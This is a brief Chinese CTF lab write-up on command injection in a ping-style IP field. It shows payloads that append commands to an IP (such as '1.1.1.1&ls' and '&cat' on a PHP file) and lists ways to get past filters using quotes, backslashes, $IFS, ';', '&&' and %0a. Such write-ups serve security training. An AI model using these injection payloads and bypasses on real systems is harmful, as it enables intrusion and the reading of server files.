CTFHUB-WEB-RCE【08】命令注入

  • 命令注入
        • 源代码用IP传入
        • IP&ls 查看文件
        • IP&cat 查看内容
  • 过滤cat
        • 使用`\` `''` `""` `{任意无意义变量名}`等方法均可绕过
  • 过滤空格
        • `$IFS` `$IFS$9` 重定向符`<`
  • 过滤目录分隔符
        • ; && 执行多条命令
  • 过滤运算符
  • 综合过滤练习
        • %0a

命令注入

源代码用IP传入
IP&ls 查看文件
1.1.1.1&ls

CTFHUB-WEB-RCE【08】命令注入_第1张图片

IP&cat 查看内容
1.1.1.1&cat 7096156205265.php

CTFHUB-WEB-RCE【08】命令注入_第2张图片

过滤cat

使用\ '' ""

你可能感兴趣的:(CTFHUB-WEB-RCE【08】命令注入)